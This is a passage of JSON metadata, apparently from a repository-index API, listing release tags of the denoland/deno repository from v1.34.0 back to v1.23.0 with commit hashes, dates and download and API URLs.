Hub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hos